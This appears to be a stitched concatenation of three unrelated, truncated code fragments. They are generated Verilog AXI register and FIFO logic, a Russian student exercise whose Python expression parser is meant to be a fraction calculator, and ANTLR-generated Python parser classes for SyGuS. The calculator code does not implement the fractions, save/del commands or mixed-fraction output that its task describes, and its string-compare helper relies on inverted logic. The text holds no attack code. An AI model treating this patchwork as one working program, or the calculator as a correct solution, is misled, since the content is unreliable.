2)? _saxi_register_2 : (axis_maskaddr_13 == 3)? _saxi_register_3 : 'hx; wire axislite_flag_15; assign axislite_flag_15 = (axis_maskaddr_13 == 0)? _saxi_flag_0 : (axis_maskaddr_13 == 1)? _saxi_flag_1 : (axis_maskaddr_13 == 2)? _saxi_flag_2 : (axis_maskaddr_13 == 3)? _saxi_flag_3 : 'hx; wire signed [32-1:0] axislite_resetval_16; assign axislite_resetval_16 = (axis_maskaddr_13 == 0)? _saxi_resetval_0 : (axis_maskaddr_13 == 1)? _saxi_resetval_1 : (axis_maskaddr_13 == 2)? _saxi_resetval_2 : (axis_maskaddr_13 == 3)? _saxi_resetval_3 : 'hx; reg _saxi_cond_0_1; assign saxi_wready = _saxi_register_fsm == 2; reg [32-1:0] th_comp; localparam th_comp_init = 0; reg signed [32-1:0] _th_comp_size_0; reg signed [32-1:0] _th_comp_i_1; reg signed [32-1:0] axistreamin_tdata_17; reg axistreamin_tlast_18; assign axi_a_tready = th_comp == 8; reg signed [32-1:0] _th_comp_a_2; reg signed [32-1:0] _th_comp_a_last_3; reg signed [32-1:0] _th_comp_b_4; reg signed [32-1:0] _th_comp_b_last_5; reg _axi_b_cond_0_1; always @(posedge CLK) begin if(RST) begin _axi_a_read_data_idle <= 1; end else begin if((th_comp == 7) && _axi_a_read_data_idle) begin _axi_a_read_data_idle <= 0; end if((th_comp == 8) && axi_a_tvalid) begin _axi_a_read_data_idle <= 1; end end end always @(posedge CLK) begin if(RST) begin count__axi_a_read_req_fifo <= 0; end else begin if(_axi_a_read_req_fifo_enq && !_axi_a_read_req_fifo_full && (_axi_a_read_req_fifo_deq && !_axi_a_read_req_fifo_empty)) begin count__axi_a_read_req_fifo <= count__axi_a_read_req_fifo; end else if(_axi_a_read_req_fifo_enq && !_axi_a_read_req_fifo_full) begin count__axi_a_read_req_fifo <= count__axi_a_read_req_fifo + 1; end else if(_axi_a_read_req_fifo_deq && !_axi_a_read_req_fifo_empty) begin count__axi_a_read_req_fifo <= count__axi_a_read_req_fifo - 1; end end end always @(posedge CLK) begin if(RST) begin _axi_b_write_data_idle <= 1; axi_b_tdata <= 0; axi_b_tvalid <= 0; axi_b_tlast <= 0; _axi_b_cond_0_1 <= 0; end else begin if(_axi_b_cond_0_1) begin axi_b_tvalid <= 0; axi_b_tlast <= 0; end if((th_comp == 12) && _axi_b_write_data_idle) begin _axi_b_write_data_idle <= 0; end if((th_comp == 13) && (axi_b_tready || !axi_b_tvalid)) begin axi_b_tdata <= _th_comp_b_4; axi_b_tvalid <= 1; axi_b_tlast <= _th_comp_b_last_5; end _axi_b_cond_0_1 <= 1; if(axi_b_tvalid && !axi_b_tready) begin axi_b_tvalid <= axi_b_tvalid; axi_b_tlast <= axi_b_tlast; end if((th_comp == 13) && (axi_b_tready || !axi_b_tvalid)) begin _axi_b_write_data_idle <= 1; end end end always @(posedge CLK) begin if(RST) begin count__axi_b_write_req_fifo <= 0; end else begin if(_axi_b_write_req_fifo_enq && !_axi_b_write_req_fifo_full && (_axi_b_write_req_fifo_deq && !_axi_b_write_req_fifo_empty)) begin count__axi_b_write_req_fifo <= count__axi_b_write_req_fifo; end else if(_axi_b_write_req_fifo_enq && !_axi_b_write_req_fifo_full) begin count__axi_b_write_req_fifo <= count__axi_b_write_req_fifo + 1; end else if(_axi_b_write_req_fifo_deq && !_axi_b_write_req_fifo_empty) begin count__axi_b_write_req_fifo <= count__axi_b_write_req_fifo - 1; end end end always @(posedge CLK) begin if(RST) begin saxi_bvalid <= 0; prev_awvalid_11 <= 0; prev_arvalid_12 <= 0; writevalid_9 <= 0; readvalid_10 <= 0; addr_8 <= 0; saxi_rdata <= 0; saxi_rvalid <= 0; _saxi_cond_0_1 <= 0; _saxi_register_0 <= 0; _saxi_flag_0 <= 0; _saxi_register_1 <= 0; _saxi_flag_1 <= 0; _saxi_register_2 <= 0; _saxi_flag_2 <= 0; _saxi_register_3 <= 0; _saxi_flag_3 <= 0; end else begin if(_saxi_cond_0_1) begin saxi_rvalid <= 0; end if(saxi_bvalid && saxi_bready) begin saxi_bvalid <= 0; end if(saxi_wvalid && saxi_wready) begin saxi_bvalid <= 1; end prev_awvalid_11 <= saxi_awvalid; prev_arvalid_12 <= saxi_arvalid; writevalid_9 <= 0; readvalid_10 <= 0; if(saxi_awready && saxi_awvalid && !saxi_bvalid) begin addr_8 <= saxi_awaddr; writevalid_9 <= 1; end else if(saxi_arready && saxi_arvalid) begin addr_8 <= saxi_araddr; readvalid_10 <= 1; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid)) begin saxi_rdata <= axislite_rdata_14; saxi_rvalid <= 1; end _saxi_cond_0_1 <= 1; if(saxi_rvalid && !saxi_rready) begin saxi_rvalid <= saxi_rvalid; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 0)) begin _saxi_register_0 <= axislite_resetval_16; _saxi_flag_0 <= 0; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 1)) begin _saxi_register_1 <= axislite_resetval_16; _saxi_flag_1 <= 0; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 2)) begin _saxi_register_2 <= axislite_resetval_16; _saxi_flag_2 <= 0; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 3)) begin _saxi_register_3 <= axislite_resetval_16; _saxi_flag_3 <= 0; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 0)) begin _saxi_register_0 <= saxi_wdata; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 1)) begin _saxi_register_1 <= saxi_wdata; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 2)) begin _saxi_register_2 <= saxi_wdata; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 3)) begin _saxi_register_3 <= saxi_wdata; end if((_saxi_register_0 == 1) && (th_comp == 2) && 1) begin _saxi_register_0 <= 0; end if((_saxi_register_0 == 1) && (th_comp == 2) && 0) begin _saxi_register_1 <= 0; end if((_saxi_register_0 == 1) && (th_comp == 2) && 0) begin _saxi_register_2 <= 0; end if((_saxi_register_0 == 1) && (th_comp == 2) && 0) begin _saxi_register_3 <= 0; end if((th_comp == 3) && 0) begin _saxi_register_0 <= 1; _saxi_flag_0 <= 0; end if((th_comp == 3) && 1) begin _saxi_register_1 <= 1; _saxi_flag_1 <= 0; end if((th_comp == 3) && 0) begin _saxi_register_2 <= 1; _saxi_flag_2 <= 0; end if((th_comp == 3) && 0) begin _saxi_register_3 <= 1; _saxi_flag_3 <= 0; end if((th_comp == 15) && 0) begin _saxi_register_0 <= 0; _saxi_flag_0 <= 0; end if((th_comp == 15) && 1) begin _saxi_register_1 <= 0; _saxi_flag_1 <= 0; end if((th_comp == 15) && 0) begin _saxi_register_2 <=
<reponame>GeorgiyDemo/FA<filename>Course I/Практика Python/Part1/pract2/task1.py """ Реализовать текстовый калькулятор нескольких правильных, неправильных и смешанных дробей и обычных чисел с математическим порядком вычисления. Способ записи смешанных дробей – 5(1/4), правильных – 5/9, неправильных 19/7. Результат должен быть сокращен и при необходимости в виде смешанной дроби. После завершения операции позволяет ввести следующее выражение. Завершение работы с программой вызывается при вводе команды exit. Также добавить в калькулятор возможность сохранение результата вычислений по команде ‘save наименование_результата’. Реализовать сохранение до 10 результатов. При вводе команды del наименование_результата удаляет результат из сохраненных. При вводе команды to double, калькулятор выводит результат в виде числа с плавающей точкой. Функцию eval() и его поодобия использовать ЗАПРЕЩЕНО! Пример: Input: 2/3 + 2 * 4 / (5-3) Output: 4(2/3) Input: save m1 Output: save success Input: 3 * (m1 + 15/6) Output: 11(1/2) Input: to double Output: 11.5 """ ## -*- coding: utf-8 -*- import math # Math consts M_PI = 3.1415926535897932384626433832795 F_G = 9.81 M_E = 2.71828182845904523536 H_LEET = 1337 # Defines MAX_EXPR_LEN = 255 MAX_TOKEN_LEN = 80 # Brackets CALC_END = -1 CALC_L_BRACKET = -2 CALC_R_BRACKET = -3 CALC_NUMBER = -4 # Operations OP_PLUS = 0 OP_MINUS = 1 OP_MULTIPLY = 2 OP_DIVIDE = 3 OP_PERCENT = 4 OP_POWER = 5 OP_UMINUS = 6 # Math Operations OP_SIN = 7 OP_COS = 8 OP_TG = 9 OP_CTG = 10 OP_ARCSIN = 11 OP_ARCCOS = 12 OP_ARCTG = 13 OP_ARCCTG = 14 OP_SH = 15 OP_CH = 16 OP_TH = 17 OP_CTH = 18 OP_EXP = 19 OP_LG = 20 OP_LN = 21 OP_SQRT = 22 OP_IN = 23 CALC_PI = 24 CALC_G = 25 CALC_LEET = 26 TERMINATOR = "\x00" def strlen(list1): list1 = list(list1) i = 0 while list1[i] != TERMINATOR: i = i + 1 return i def strcmp(list1, list2): list1 = list(list1) list2 = list(list2) total = len(list1) if len(list1) < len(list2) else len(list2) for i in range(0, total): if i > len(list1) - 1: return not True elif i > len(list2): return not True elif list1[i] != list2[i]: return not False else: continue def atof(text): text = "".join(text[: strlen(text)]) integer = int(text) double = float(text) if integer == double: return integer else: return double class TCALCNode: value = 0 left = None right = None def __init__(self, _value=0, _left=None, _right=None): self.left = _left self.right = _right self.value = _value class TCALC: root = None expr = [TERMINATOR for i in range(0, MAX_EXPR_LEN)] curToken = [TERMINATOR for i in range(0, MAX_TOKEN_LEN)] typToken = 0 pos = 0 result = 0 def IsDelim(self): for char in list("+-*/%^()[]"): if self.expr[self.pos] == char: return True else: continue return False def IsLetter(self): return ( ord(self.expr[self.pos]) >= ord("a") and ord(self.expr[self.pos]) <= ord("z") ) or ( ord(self.expr[self.pos]) >= ord("A") and ord(self.expr[self.pos]) <= ord("Z") ) def IsDigit(self): return ord(self.expr[self.pos]) >= ord("0") and ord(self.expr[self.pos]) <= ord( "9" ) def IsPoint(self): return self.expr[self.pos] == "." def GetToken(self): self.curToken[0] = TERMINATOR while self.expr[self.pos] == " ": self.pos = self.pos + 1 if self.expr[self.pos] == TERMINATOR: self.curToken[0] = TERMINATOR self.typToken = CALC_END return True elif self.IsDelim(): choose_dict = { "+": OP_PLUS, "-": OP_MINUS, "*": OP_MULTIPLY, "/": OP_DIVIDE, "%": OP_PERCENT, "[": CALC_L_BRACKET, "(": CALC_L_BRACKET, "]": CALC_R_BRACKET, ")": CALC_R_BRACKET, } self.curToken[0] = self.expr[self.pos] self.pos = self.pos + 1 self.curToken[1] = TERMINATOR tmp = "".join(self.curToken[: strlen(self.curToken)]) if tmp in choose_dict: self.typToken = choose_dict[tmp] return True elif self.IsLetter(): i = 0 while self.IsLetter(): self.curToken[i] = self.expr[self.pos] self.pos = self.pos + 1 i = i + 1 self.curToken[i] = TERMINATOR len = strlen(self.curToken) for i in range(0, len): if ord(self.curToken[i]) >= ord("A") and ord(self.curToken[i]) <= ord( "Z" ): self.curToken[i] = chr(ord(self.curToken[i]) + ord("a") - ord("A")) if not strcmp(self.curToken, list("leet")): self.typToken = CALC_LEET return True elif not strcmp(self.curToken, list("g")): self.typToken = CALC_G return True elif not strcmp(self.curToken, list("pi")): self.typToken = CALC_PI return True elif not strcmp(self.curToken, list("sin")): self.typToken = OP_SIN return True elif not strcmp(self.curToken, list("cos")): self.typToken = OP_COS return True elif not strcmp(self.curToken, list("tg")): self.typToken = OP_TG return True elif not strcmp(self.curToken, list("ctg")): self.typToken = OP_CTG return True elif not strcmp(self.curToken, list("arcsin")): self.typToken = OP_ARCSIN return True elif not strcmp(self.curToken, list("arccos")): self.typToken = OP_ARCCOS return True elif not strcmp(self.curToken, list("sh")): self.typToken = OP_SH return True elif not strcmp(self.curToken, list("ch")): self.typToken = OP_CH return True elif not strcmp(self.curToken, list("th")): self.typToken = OP_TH return True elif not strcmp(self.curToken, list("cth")): self.typToken = OP_CTH return True elif not strcmp(self.curToken, list("exp")): self.typToken = OP_EXP return True elif not strcmp(self.curToken, list("lg")): self.typToken = OP_LG return True elif not strcmp(self.curToken, list("ln")): self.typToken = OP_LN return True elif not strcmp(self.curToken, list("sqrt")): self.typToken = OP_SQRT return True else: self.SendError(0) elif self.IsDigit() or self.IsPoint(): i = 0 while self.IsDigit(): self.curToken[i] = self.expr[self.pos] self.pos = self.pos + 1 i = i + 1 if self.IsPoint(): self.curToken[i] = self.expr[self.pos] self.pos = self.pos + 1 i = i + 1 while self.IsDigit(): self.curToken[i] = self.expr[self.pos] self.pos = self.pos + 1 i = i + 1 self.curToken[i] = TERMINATOR self.typToken = CALC_NUMBER return True else: self.curToken[0] = self.expr[self.pos] self.pos = self.pos + 1 self.curToken[1] = TERMINATOR self.SendError(1) return False def CreateNode(self, _value, _left, _right): return TCALCNode(_value, _left, _right) def Expr(self): temp = self.Expr1() while True: if self.typToken == OP_PLUS: self.GetToken() temp = self.CreateNode(OP_PLUS, temp, self.Expr1()) elif self.typToken == OP_MINUS: self.GetToken() temp = self.CreateNode(OP_MINUS, temp, self.Expr1()) else: break return temp def Expr1(self): temp = self.Expr2() while True: if self.typToken == OP_MULTIPLY: self.GetToken() temp = self.CreateNode(OP_MULTIPLY, temp, self.Expr2()) elif self.typToken == OP_DIVIDE: self.GetToken() temp = self.CreateNode(OP_DIVIDE, temp, self.Expr2()) elif self.typToken == OP_PERCENT: self.GetToken() temp = self.CreateNode(OP_PERCENT, temp, self.Expr2()) else: break return temp def Expr2(self): temp = None if self.typToken == OP_PLUS: self.GetToken() temp = self.Expr3() elif self.typToken == OP_MINUS: self.GetToken() temp = self.CreateNode(OP_UMINUS, self.Expr3(), None) else: temp = self.Expr3() return temp def Expr3(self): temp = None if self.typToken >= OP_SIN and self.typToken <= OP_SQRT + 1: temp = self.CreateNode(OP_SIN - OP_SIN + self.typToken, None, None) self.GetToken() if self.typToken != CALC_L_BRACKET: self.SendError(4) self.GetToken() temp.left = self.Expr() if self.typToken != CALC_R_BRACKET: self.SendError(5) self.GetToken() else: temp = self.Expr4() return temp def Expr4(self): temp = None if self.typToken == CALC_NUMBER: temp = self.CreateNode(atof(self.curToken), None, None) self.GetToken() elif self.typToken == CALC_PI: temp = self.CreateNode(M_PI, None, None) self.GetToken() elif self.typToken == CALC_G: temp = self.CreateNode(F_G, None, None) self.GetToken() elif self.typToken == CALC_L_BRACKET: self.GetToken() temp = self.Expr() if self.typToken != CALC_R_BRACKET: self.SendError(5) self.GetToken() elif self.typToken == CALC_LEET: temp = self.CreateNode(H_LEET, None, None) self.GetToken() else: self.SendError(5) return temp def SendError(self, errNum): if self.curToken == TERMINATOR: print("Пустое выражение") elif errNum == 2: print("Внезапный конец выражения") elif errNum == 3: print("Конец выражения ожидается") elif errNum == 4: print("Пропущеннаи открывающая скобка") elif errNum == 5: print("Пропущенна закрывающая скобка") else: print("Неизвестная ошибка") raise Exception("") def Compile(self, _expr): self.pos = 0 self.expr = _expr + [TERMINATOR] if self.root != None: self.root = None self.GetToken() if self.typToken == CALC_END: self.SendError(2) self.root = self.Expr() if self.typToken != CALC_END: self.SendError(3) return True def GetResult(self): return self.result def Evaluate(self): self.result = self.CalcTree(self.root) def CalcTree(self, tree): temp = 0 if tree.left == None and tree.right == None: return tree.value else: op = tree.value if op == OP_PLUS: return self.CalcTree(tree.left) + self.CalcTree(tree.right) elif op == OP_MINUS: return self.CalcTree(tree.left) - self.CalcTree(tree.right) elif op == OP_MULTIPLY: return self.CalcTree(tree.left) * self.CalcTree(tree.right) elif op == OP_DIVIDE: return self.CalcTree(tree.left) / self.CalcTree(tree.right) elif op == OP_PERCENT: return self.CalcTree(tree.left) % (self.CalcTree(tree.right)) elif op == OP_POWER: return math.pow(self.CalcTree(tree.left), self.CalcTree(tree.right)) elif op == OP_UMINUS: return -self.CalcTree(tree.left) elif op == OP_SIN: return math.sin(self.CalcTree(tree.left)) elif op == OP_COS: return math.cos(self.CalcTree(tree.left)) elif op == OP_TG: return math.tan(self.CalcTree(tree.left)) elif op == OP_CTG: return 1.0 / math.tan(self.CalcTree(tree.left)) elif op == OP_ARCSIN: return math.asin(self.CalcTree(tree.left)) elif op == OP_ARCCOS: return math.acos(self.CalcTree(tree.left)) elif op == OP_ARCTG: return math.atan(self.CalcTree(tree.left)) elif op == OP_ARCCTG: return M_PI / 2.0 - math.atan(self.CalcTree(tree.left)) elif op == OP_SH: temp = self.CalcTree(tree.left) return (math.exp(temp) - math.exp(-temp)) / 2.0 elif op == OP_CH: temp = self.CalcTree(tree.left) return (math.exp(temp) + math.exp(-temp)) / 2.0 elif op == OP_TH: temp = self.CalcTree(tree.left) return (math.exp(temp) - math.exp(-temp)) / ( math.exp(temp) + math.exp(-temp) ) elif op == OP_CTH: temp = self.CalcTree(tree.left) return (math.exp(temp) + math.exp(-temp)) / ( math.exp(temp) - math.exp(-temp) ) elif op == OP_EXP: return math.exp(self.CalcTree(tree.left)) elif op == OP_LG: return math.log10(self.CalcTree(tree.left)) elif op == OP_LN: return math.log(self.CalcTree(tree.left)) elif op == OP_SQRT: return math.sqrt(self.CalcTree(tree.left)) elif op == OP_IN: return 1
def declarePrimedVar(self): return self.getTypedRuleContext(SygusParser.DeclarePrimedVarContext,0) def invConstraintCmd(self): return self.getTypedRuleContext(SygusParser.InvConstraintCmdContext,0) def getRuleIndex(self): return SygusParser.RULE_cmd def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterCmd" ): listener.enterCmd(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitCmd" ): listener.exitCmd(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitCmd" ): return visitor.visitCmd(self) else: return visitor.visitChildren(self) def cmd(self): localctx = SygusParser.CmdContext(self, self._ctx, self.state) self.enterRule(localctx, 12, self.RULE_cmd) try: self.state = 143 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,3,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 132 self.funDefCmd() pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 133 self.funDeclCmd() pass elif la_ == 3: self.enterOuterAlt(localctx, 3) self.state = 134 self.synthFunCmd() pass elif la_ == 4: self.enterOuterAlt(localctx, 4) self.state = 135 self.checkSynthCmd() pass elif la_ == 5: self.enterOuterAlt(localctx, 5) self.state = 136 self.constraintCmd() pass elif la_ == 6: self.enterOuterAlt(localctx, 6) self.state = 137 self.sortDefCmd() pass elif la_ == 7: self.enterOuterAlt(localctx, 7) self.state = 138 self.setOptsCmd() pass elif la_ == 8: self.enterOuterAlt(localctx, 8) self.state = 139 self.varDeclCmd() pass elif la_ == 9: self.enterOuterAlt(localctx, 9) self.state = 140 self.synthInvCmd() pass elif la_ == 10: self.enterOuterAlt(localctx, 10) self.state = 141 self.declarePrimedVar() pass elif la_ == 11: self.enterOuterAlt(localctx, 11) self.state = 142 self.invConstraintCmd() pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class VarDeclCmdContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def sortExpr(self): return self.getTypedRuleContext(SygusParser.SortExprContext,0) def getRuleIndex(self): return SygusParser.RULE_varDeclCmd def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterVarDeclCmd" ): listener.enterVarDeclCmd(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitVarDeclCmd" ): listener.exitVarDeclCmd(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitVarDeclCmd" ): return visitor.visitVarDeclCmd(self) else: return visitor.visitChildren(self) def varDeclCmd(self): localctx = SygusParser.VarDeclCmdContext(self, self._ctx, self.state) self.enterRule(localctx, 14, self.RULE_varDeclCmd) try: self.enterOuterAlt(localctx, 1) self.state = 145 self.match(SygusParser.T__0) self.state = 146 self.match(SygusParser.T__3) self.state = 147 self.symbol() self.state = 148 self.sortExpr() self.state = 149 self.match(SygusParser.T__2) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class SortDefCmdContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def sortExpr(self): return self.getTypedRuleContext(SygusParser.SortExprContext,0) def getRuleIndex(self): return SygusParser.RULE_sortDefCmd def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterSortDefCmd" ): listener.enterSortDefCmd(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitSortDefCmd" ): listener.exitSortDefCmd(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitSortDefCmd" ): return visitor.visitSortDefCmd(self) else: return visitor.visitChildren(self) def sortDefCmd(self): localctx = SygusParser.SortDefCmdContext(self, self._ctx, self.state) self.enterRule(localctx, 16, self.RULE_sortDefCmd) try: self.enterOuterAlt(localctx, 1) self.state = 151 self.match(SygusParser.T__0) self.state = 152 self.match(SygusParser.T__4) self.state = 153 self.symbol() self.state = 154 self.sortExpr() self.state = 155 self.match(SygusParser.T__2) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class SortExprContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def intConst(self): return self.getTypedRuleContext(SygusParser.IntConstContext,0) def eCList(self): return self.getTypedRuleContext(SygusParser.ECListContext,0) def sortExpr(self, i:int=None): if i is None: return self.getTypedRuleContexts(SygusParser.SortExprContext) else: return self.getTypedRuleContext(SygusParser.SortExprContext,i) def symbol(self): return self.getTypedRuleContext(SygusParser.SymbolContext,0) def getRuleIndex(self): return SygusParser.RULE_sortExpr def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterSortExpr" ): listener.enterSortExpr(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitSortExpr" ): listener.exitSortExpr(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitSortExpr" ): return visitor.visitSortExpr(self) else: return visitor.visitChildren(self) def sortExpr(self): localctx = SygusParser.SortExprContext(self, self._ctx, self.state) self.enterRule(localctx, 18, self.RULE_sortExpr) try: self.state = 177 self._errHandler.sync(self) la_ = self._interp.adaptivePredict(self._input,4,self._ctx) if la_ == 1: self.enterOuterAlt(localctx, 1) self.state = 157 self.match(SygusParser.T__0) self.state = 158 self.match(SygusParser.T__5) self.state = 159 self.intConst() self.state = 160 self.match(SygusParser.T__2) pass elif la_ == 2: self.enterOuterAlt(localctx, 2) self.state = 162 self.match(SygusParser.T__6) pass elif la_ == 3: self.enterOuterAlt(localctx, 3) self.state = 163 self.match(SygusParser.T__7) pass elif la_ == 4: self.enterOuterAlt(localctx, 4) self.state = 164 self.match(SygusParser.T__8) pass elif la_ == 5: self.enterOuterAlt(localctx, 5) self.state = 165 self.match(SygusParser.T__0) self.state = 166 self.match(SygusParser.T__9) self.state = 167 self.eCList() self.state = 168 self.match(SygusParser.T__2) pass elif la_ == 6: self.enterOuterAlt(localctx, 6) self.state = 170 self.match(SygusParser.T__0) self.state = 171 self.match(SygusParser.T__10) self.state = 172 self.sortExpr() self.state = 173 self.sortExpr() self.state = 174 self.match(SygusParser.T__2) pass elif la_ == 7: self.enterOuterAlt(localctx, 7) self.state = 176 self.symbol() pass except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class IntConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def INTEGER(self): return self.getToken(SygusParser.INTEGER, 0) def getRuleIndex(self): return SygusParser.RULE_intConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterIntConst" ): listener.enterIntConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitIntConst" ): listener.exitIntConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitIntConst" ): return visitor.visitIntConst(self) else: return visitor.visitChildren(self) def intConst(self): localctx = SygusParser.IntConstContext(self, self._ctx, self.state) self.enterRule(localctx, 20, self.RULE_intConst) try: self.enterOuterAlt(localctx, 1) self.state = 179 self.match(SygusParser.INTEGER) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class BoolConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def getRuleIndex(self): return SygusParser.RULE_boolConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterBoolConst" ): listener.enterBoolConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitBoolConst" ): listener.exitBoolConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitBoolConst" ): return visitor.visitBoolConst(self) else: return visitor.visitChildren(self) def boolConst(self): localctx = SygusParser.BoolConstContext(self, self._ctx, self.state) self.enterRule(localctx, 22, self.RULE_boolConst) self._la = 0 # Token type try: self.enterOuterAlt(localctx, 1) self.state = 181 _la = self._input.LA(1) if not(_la==SygusParser.T__11 or _la==SygusParser.T__12): self._errHandler.recoverInline(self) else: self._errHandler.reportMatch(self) self.consume() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class BVConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def BVCONST(self): return self.getToken(SygusParser.BVCONST, 0) def getRuleIndex(self): return SygusParser.RULE_bVConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterBVConst" ): listener.enterBVConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitBVConst" ): listener.exitBVConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitBVConst" ): return visitor.visitBVConst(self) else: return visitor.visitChildren(self) def bVConst(self): localctx = SygusParser.BVConstContext(self, self._ctx, self.state) self.enterRule(localctx, 24, self.RULE_bVConst) try: self.enterOuterAlt(localctx, 1) self.state = 183 self.match(SygusParser.BVCONST) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class EnumConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbol(self, i:int=None): if i is None: return self.getTypedRuleContexts(SygusParser.SymbolContext) else: return self.getTypedRuleContext(SygusParser.SymbolContext,i) def getRuleIndex(self): return SygusParser.RULE_enumConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterEnumConst" ): listener.enterEnumConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitEnumConst" ): listener.exitEnumConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitEnumConst" ): return visitor.visitEnumConst(self) else: return visitor.visitChildren(self) def enumConst(self): localctx = SygusParser.EnumConstContext(self, self._ctx, self.state) self.enterRule(localctx, 26, self.RULE_enumConst) try: self.enterOuterAlt(localctx, 1) self.state = 185 self.symbol() self.state = 186 self.match(SygusParser.T__13) self.state = 187 self.symbol() except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class RealConstContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def REALCONST(self): return self.getToken(SygusParser.REALCONST, 0) def getRuleIndex(self): return SygusParser.RULE_realConst def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterRealConst" ): listener.enterRealConst(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitRealConst" ): listener.exitRealConst(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitRealConst" ): return visitor.visitRealConst(self) else: return visitor.visitChildren(self) def realConst(self): localctx = SygusParser.RealConstContext(self, self._ctx, self.state) self.enterRule(localctx, 28, self.RULE_realConst) try: self.enterOuterAlt(localctx, 1) self.state = 189 self.match(SygusParser.REALCONST) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class ECListContext(ParserRuleContext): def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1): super().__init__(parent, invokingState) self.parser = parser def symbolPlus(self): return self.getTypedRuleContext(SygusParser.SymbolPlusContext,0) def getRuleIndex(self): return SygusParser.RULE_eCList def enterRule(self, listener:ParseTreeListener): if hasattr( listener, "enterECList" ): listener.enterECList(self) def exitRule(self, listener:ParseTreeListener): if hasattr( listener, "exitECList" ): listener.exitECList(self) def accept(self, visitor:ParseTreeVisitor): if hasattr( visitor, "visitECList" ): return visitor.visitECList(self) else: return visitor.visitChildren(self) def eCList(self): localctx = SygusParser.ECListContext(self, self._ctx, self.state) self.enterRule(localctx, 30, self.RULE_eCList) try: self.enterOuterAlt(localctx, 1) self.state = 191 self.match(SygusParser.T__0) self.state = 192 self.symbolPlus() self.state = 193 self.match(SygusParser.T__2) except RecognitionException as re: localctx.exception = re self._errHandler.reportError(self, re) self._errHandler.recover(self, re) finally: self.exitRule() return localctx class SymbolPlusContext(ParserRuleContext): def __init__(self, parser, 